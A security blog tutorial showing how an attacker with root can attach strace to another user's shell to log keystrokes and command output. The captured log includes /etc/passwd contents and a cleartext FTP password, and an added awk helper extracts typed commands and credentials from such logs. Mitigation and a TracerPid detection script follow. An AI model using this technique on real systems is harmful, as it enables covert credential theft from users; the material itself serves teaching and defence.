The strace tool is commonly used for debugging applications on Linux: it traces the system calls a process makes and the signals it receives. Because it is more than likely already installed on your system, we will look at how an attacker can turn a tool that is already there to his advantage.
Assumption: the attacker is already logged in on the machine we are using, in this example as root (attaching to another user's process with ptrace needs privileges).
For this example, we will perform the following:
1. Start strace and attach it to a specific PID
2. Capture all keystrokes typed into that PID, and into any child it forks (creates)
3. Store this information in a file for offline analysis
Let's begin!
Let's see what shells we currently have available
root@securitynik:~# ps aux | grep bash
root      3103  0.0  0.6   6140  3392 pts/0    Ss+  17:14   0:00 bash
root      3199  0.0  0.6   6140  3540 pts/1    Ss   17:18   0:00 bash
root      3373  0.0  0.1   3488   768 pts/1    S+   18:06   0:00 grep bash
Hmmm. Let's see which one belongs to us
root@securitynik:~# tty
/dev/pts/1
We are on /dev/pts/1, so the bash on /dev/pts/0 (PID 3103) is the one we should hook into. Let's do that.
Let's start strace and send it to the background
root@securitynik:~# strace -p 3103 -t -e write -q -f -o keylogger.txt &
[1] 3432
Above we are telling strace to do the following:
1. -p 3103: attach to PID 3103, which above is the bash on pts/0
2. -t: prefix each line with the time of day
3. -e write: only trace the write system call (shorthand for -e trace=write)
4. -q: be quiet, i.e. suppress the attach and detach messages
5. -f: follow forks, so the children of the shell (the commands it runs) are traced too
6. -o keylogger.txt: write the trace to a file named keylogger.txt instead of stderr
Using the console with PID 3103 (pts/0), let's run a few commands and connect to a remote system running FTP:
root@securitynik:~# id
uid=0(root) gid=0(root) groups=0(root)
root@securitynik:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
root@securitynik:~# ftp 192.168.0.50
Connected to 192.168.0.50.
220 Microsoft FTP Service
Name (192.168.0.50:root): administrator
331 Password required for administrator.
Password:
230-Welcome to securitynik FTP Server :-D
230 User administrator logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
ftp> exit
221 Do return soon :-)
So the above commands were run, but what did we capture? Let's find out. Bash echoes each character it reads back to the terminal on stderr (fd 2), so keystrokes show up as one write(2, ...) per key, while the output of each command comes from a child PID writing to fd 1. The file is truncated for brevity.
root@securitynik:~# cat keylogger.txt | more
-------- results from the id command ---------
3103 18:20:51 write(2, "i", 1) = 1
3103 18:20:51 write(2, "d", 1) = 1
3103 18:20:52 write(2, "\n", 1) = 1
3449 18:20:52 write(1, "uid=0(root) gid=0(root) groups=0"..., 39) = 39
--------- results from cat /etc/passwd ---------
3103 18:20:57 write(2, "c", 1) = 1
3103 18:20:57 write(2, "a", 1) = 1
3103 18:20:57 write(2, "t", 1) = 1
3103 18:20:57 write(2, " ", 1) = 1
3103 18:20:58 write(2, "/", 1) = 1
3103 18:20:58 write(2, "e", 1) = 1
3103 18:20:58 write(2, "t", 1) = 1
......
3103 18:20:59 write(3, "/etc", 4) = 4
3103 18:20:59 write(3, "\n", 1) = 1
3103 18:20:59 write(2, "c/", 2) = 2
3103 18:21:01 write(2, "p", 1) = 1
3103 18:21:01 write(2, "a", 1) = 1
3103 18:21:01 write(2, "s", 1) = 1
3103 18:21:01 write(2, "s", 1) = 1
3103 18:21:01 write(2, "w", 1) = 1
3103 18:21:02 write(2, "d", 1) = 1
3103 18:21:02 write(2, "\n", 1) = 1
3468 18:21:02 write(1, "root:x:0:0:root:/root:/bin/bash\n"..., 2279) = 2279
---------- and last but not least the results from the FTP session --------
3103 18:21:02 write(2, "\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70
3103 18:21:17 write(2, "f", 1) = 1
3103 18:21:18 write(2, "t", 1) = 1
3103 18:21:18 write(2, "p", 1) = 1
…..
3103 18:21:24 write(2, "1", 1) = 1
3103 18:21:24 write(2, "9", 1) = 1
3103 18:21:24 write(2, "2", 1) = 1
3103 18:21:24 write(2, ".", 1) = 1
3103 18:21:25 write(2, "1", 1) = 1
3103 18:21:25 write(2, "6", 1) = 1
3103 18:21:25 write(2, "8", 1) = 1
3103 18:21:26 write(2, ".", 1) = 1
3103 18:21:26 write(2, "0", 1) = 1
3103 18:21:26 write(2, ".", 1) = 1
3103 18:21:26 write(2, "5", 1) = 1
3103 18:21:26 write(2, "0", 1) = 1
3103 18:21:27 write(2, "\n", 1) = 1
3470 18:21:27 write(1, "Connected to 192.168.0.50.\n", 27) = 27
3470 18:21:27 write(1, "220 Microsoft FTP Service\n", 26) = 26
3470 18:21:27 write(1, "Name (192.168.0.50:root): ", 26) = 26
3470 18:21:31 write(5, "USER administrator\r\n", 20) = 20
3470 18:21:31 write(1, "331 Password required for admini"..., 41) = 41
3470 18:21:31 write(6, "Password:", 9) = 9
3470 18:21:35 write(6, "\n", 1) = 1
3470 18:21:35 write(5, "PASS Testing1\r\n", 15) = 15
3470 18:21:35 write(1, "230-Welcome to securitynik FTP S"..., 42) = 42
3470 18:21:35 write(1, "230 User administrator logged in"..., 34) = 34
3470 18:21:35 write(5, "SYST\r\n", 6) = 6
3470 18:21:35 write(1, "Remote system type is Windows_NT"..., 34) = 34
3470 18:21:35 write(1, "ftp> ", 5) = 5
3470 18:21:38 write(1, "d", 1) = 1
3470 18:21:39 write(1, "i", 1) = 1
3470 18:21:39 write(1, "r", 1) = 1
3470 18:21:39 write(1, "\n", 1) = 1
3470 18:21:39 write(5, "PORT 192,168,0,15,230,54\r\n", 26) = 26
3470 18:21:39 write(1, "200 PORT command successful.\n", 29) = 29
3470 18:21:39 write(5, "LIST\r\n", 6) = 6
3470 18:21:39 write(1, "150 Opening ASCII mode data conn"..., 52) = 52
3470 18:21:39 write(1, "226 Transfer complete.\n", 23) = 23
3470 18:21:39 write(1, "ftp> ", 5) = 5
3470 18:21:43 write(1, "e", 1) = 1
3470 18:21:43 write(1, "x", 1) = 1
3470 18:21:44 write(1, "i", 1) = 1
3470 18:21:44 write(1, "t", 1) = 1
3470 18:21:44 write(1, "\n", 1) = 1
3470 18:21:44 write(5, "QUIT\r\n", 6) = 6
3470 18:21:44 write(1, "221 Do return soon :-) \n", 24) = 24
3103 18:21:44 --- SIGCHLD (Child exited) @ 0 (0) ---
3103 18:21:44 write(2, "\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70
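Reading one keystroke per line gets old fast, so here is a small awk-based helper that turns a log like the one above back into what was typed and what went out on the wire. This is an added example and not part of the original post: it assumes the line layout produced by strace -t -e write (pid, time, call) as shown above, the function names reassemble_writes, extract_protocol_lines and write_sample_log are mine, and the embedded log is a constructed sample trimmed from the capture (a couple of runs of single keystrokes are condensed into one write to keep it short).

```shell
#!/bin/sh
# Added example, not from the original post: turn an "strace -t -e write" log
# back into what the victim typed and what the traced programs sent on the wire.
# Bash echoes every character it reads through readline to stderr, so the typed
# command line is the concatenation of the shell PID's write(2, ...) payloads;
# the ftp client echoes on stdout (fd 1) and talks to the server on a socket fd.

# Print the concatenated payloads of every complete write(FD, ...) call made by
# PID. Truncated payloads (strace prints those as "..."...), such as the prompt
# escape sequence, are skipped; "\n" escapes become real newlines.
reassemble_writes() {          # usage: reassemble_writes PID FD LOGFILE
    awk -v pid="$1" -v fd="$2" '
        $1 == pid && $3 == ("write(" fd ",") {
            s = $0
            sub(/^[^"]*"/, "", s)                    # drop up to the opening quote
            if (s !~ /", [0-9]+\) = [0-9]+$/) next   # truncated payload: skip it
            sub(/", [0-9]+\) = [0-9]+$/, "", s)      # drop closing quote and counts
            gsub(/\\"/, "\"", s)                     # unescape embedded quotes
            gsub(/\\n/, "\n", s)                     # turn "\n" escapes into newlines
            printf "%s", s
        }' "$3"
}

# Print every protocol line (payload ending in "\r\n") that PID wrote on any
# fd. The FTP control channel, USER and PASS included, shows up here in clear.
extract_protocol_lines() {     # usage: extract_protocol_lines PID LOGFILE
    awk -v pid="$1" '
        $1 == pid && $3 ~ /^write\([0-9]+,$/ {
            s = $0
            sub(/^[^"]*"/, "", s)
            if (s !~ /\\r\\n", [0-9]+\) = [0-9]+$/) next
            sub(/\\r\\n", [0-9]+\) = [0-9]+$/, "", s)
            print s
        }' "$2"
}

# Constructed sample log, trimmed from the capture in the post ("passwd" and the
# IP address are written as single payloads here to keep the sample short).
write_sample_log() {           # usage: write_sample_log OUTFILE
    cat > "$1" <<'EOF'
3103 18:20:51 write(2, "i", 1) = 1
3103 18:20:51 write(2, "d", 1) = 1
3103 18:20:52 write(2, "\n", 1) = 1
3449 18:20:52 write(1, "uid=0(root) gid=0(root) groups=0"..., 39) = 39
3103 18:20:57 write(2, "c", 1) = 1
3103 18:20:57 write(2, "a", 1) = 1
3103 18:20:57 write(2, "t", 1) = 1
3103 18:20:57 write(2, " ", 1) = 1
3103 18:20:58 write(2, "/", 1) = 1
3103 18:20:58 write(2, "e", 1) = 1
3103 18:20:58 write(2, "t", 1) = 1
3103 18:20:59 write(3, "/etc", 4) = 4
3103 18:20:59 write(2, "c/", 2) = 2
3103 18:21:01 write(2, "passwd", 6) = 6
3103 18:21:02 write(2, "\n", 1) = 1
3468 18:21:02 write(1, "root:x:0:0:root:/root:/bin/bash\n"..., 2279) = 2279
3103 18:21:02 write(2, "\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70
3103 18:21:17 write(2, "f", 1) = 1
3103 18:21:18 write(2, "t", 1) = 1
3103 18:21:18 write(2, "p", 1) = 1
3103 18:21:18 write(2, " ", 1) = 1
3103 18:21:24 write(2, "192.168.0.50", 12) = 12
3103 18:21:27 write(2, "\n", 1) = 1
3470 18:21:27 write(1, "Connected to 192.168.0.50.\n", 27) = 27
3470 18:21:31 write(5, "USER administrator\r\n", 20) = 20
3470 18:21:31 write(6, "Password:", 9) = 9
3470 18:21:35 write(5, "PASS Testing1\r\n", 15) = 15
3470 18:21:35 write(5, "SYST\r\n", 6) = 6
3470 18:21:39 write(5, "PORT 192,168,0,15,230,54\r\n", 26) = 26
3470 18:21:39 write(5, "LIST\r\n", 6) = 6
3470 18:21:44 write(5, "QUIT\r\n", 6) = 6
3103 18:21:44 --- SIGCHLD (Child exited) @ 0 (0) ---
EOF
}

main() {
    log=$(mktemp)
    write_sample_log "$log"
    echo "== commands typed into the shell (pid 3103, fd 2) =="
    reassemble_writes 3103 2 "$log"
    echo "== FTP control channel sent by pid 3470 =="
    extract_protocol_lines 3470 "$log"
    rm -f "$log"
}
main
```

Run against a real keylogger.txt, reassemble_writes with the shell's PID and fd 2 gives the command history of the victim terminal, and extract_protocol_lines with the PID of any child that spoke a line-oriented clear-text protocol (ftp, telnet, smtp) gives the credentials it sent. Payloads strace cut off with "..." are dropped rather than guessed at; use strace -s with a larger string size if you need them whole.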
As can be seen, the tools already on our systems can be used for bad just as easily as for good. Note what the FTP session gave up: the password was never echoed to the terminal (the client wrote only the "Password:" prompt and a newline to fd 6), but the client's own write of "PASS Testing1\r\n" to the control socket on fd 5 was captured just the same. Anything a traced process sends in clear text on the wire is visible this way.
How to mitigate this?
Be aware of what processes you expect to see on your systems. If you don't use strace for debugging and see it in your "ps aux" output, then you need to investigate why it is there.
Do not rely on the process name alone, since the binary can be copied under another name. A process that has a tracer attached always shows a non-zero TracerPid in /proc/<pid>/status. On kernels with the Yama LSM, setting /proc/sys/kernel/yama/ptrace_scope to 1 stops an unprivileged user from attaching to a process that is not a descendant of the tracer; root, holding CAP_SYS_PTRACE, can still attach, which is why the example above works.
root@securitynik:~# ps aux | grep strace
root      3432  0.0  0.1   2088   644 pts/1    S    18:15   0:00 strace -p 3103 -t -e write -q -f -o keylogger.txt
Further checks: lsof shows the tracer's open files, including the terminal it was started from (pts/1) and the file the captured keystrokes are going to (fd 3w, /root/keylogger.txt)
root@securitynik:~# lsof | grep strace
strace  3432 root  cwd   DIR    8,1     4096 785892 /root
strace  3432 root  rtd   DIR    8,1     4096      2 /
strace  3432 root  txt   REG    8,1   207880 785911 /usr/bin/strace
strace  3432 root  mem   REG    8,1  1441960 655121 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
strace  3432 root  mem   REG    8,1   117960 679406 /lib/i386-linux-gnu/ld-2.13.so
strace  3432 root    0u  CHR  136,1      0t0      4 /dev/pts/1
strace  3432 root    1u  CHR  136,1      0t0      4 /dev/pts/1
strace  3432 root    2u  CHR  136,1      0t0      4 /dev/pts/1
strace  3432 root    3w  REG    8,1     4782 800789 /root/keylogger.txt
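A check that does not depend on the tracer being called "strace" is to ask the kernel which processes are being traced. The script below is an added example and not part of the original post: it reads the TracerPid field of /proc/<pid>/status and the Yama ptrace_scope sysctl (present only on kernels with Yama), the function names list_traced_processes, ptrace_scope and make_fake_proc are mine, and the optional directory argument exists only so the functions can be exercised against a constructed fake proc tree.

```shell
#!/bin/sh
# Added example, not from the original post: find processes that currently have
# a ptrace tracer attached. "strace -p" works via ptrace(PTRACE_ATTACH) and the
# kernel records the tracer in the TracerPid line of /proc/PID/status, so this
# catches the keylogger above even if the strace binary was renamed. The first
# argument is the proc mount to scan (default /proc); another directory is
# accepted only so the function can be run against a constructed fake tree.

# Print "PID NAME traced-by TRACERPID" for every process with a tracer attached.
list_traced_processes() {      # usage: list_traced_processes [PROCROOT]
    proc="${1:-/proc}"
    for dir in "$proc"/[0-9]*; do
        [ -r "$dir/status" ] || continue
        pid="${dir##*/}"
        awk -v pid="$pid" '
            /^Name:/      { name = $2 }
            /^TracerPid:/ { tracer = $2 }
            END { if (tracer != "" && tracer + 0 != 0)
                      printf "%s %s traced-by %s\n", pid, name, tracer }
        ' "$dir/status" 2>/dev/null
    done
}

# Report the Yama ptrace policy: 0 lets any process of the same uid attach,
# 1 restricts attach to descendants (so "strace -p" on an unrelated shell fails
# for a non-root user), 2 requires CAP_SYS_PTRACE, 3 disables attach entirely.
ptrace_scope() {               # usage: ptrace_scope [PROCROOT]
    f="${1:-/proc}/sys/kernel/yama/ptrace_scope"
    if [ -r "$f" ]; then cat "$f"; else echo "yama-not-available"; fi
}

# Constructed two-process fake proc tree (a traced bash and a clean bash) used
# for the demonstration below; values mirror the PIDs used in the post.
make_fake_proc() {             # usage: make_fake_proc DIR
    mkdir -p "$1/3103" "$1/3199" "$1/sys/kernel/yama"
    printf 'Name:\tbash\nPid:\t3103\nTracerPid:\t3432\n' > "$1/3103/status"
    printf 'Name:\tbash\nPid:\t3199\nTracerPid:\t0\n'    > "$1/3199/status"
    printf '1\n' > "$1/sys/kernel/yama/ptrace_scope"
}

main() {
    echo "== live system =="
    list_traced_processes
    echo "ptrace_scope: $(ptrace_scope)"
    echo "== constructed sample =="
    fake=$(mktemp -d)
    make_fake_proc "$fake"
    list_traced_processes "$fake"
    echo "ptrace_scope: $(ptrace_scope "$fake")"
    rm -rf "$fake"
}
main
```

On the box from the post, the live scan would print "3103 bash traced-by 3432", pointing straight at the PID found in the ps and lsof output above; a TracerPid that belongs to no debugger you started is worth the same investigation as an unexpected strace in ps.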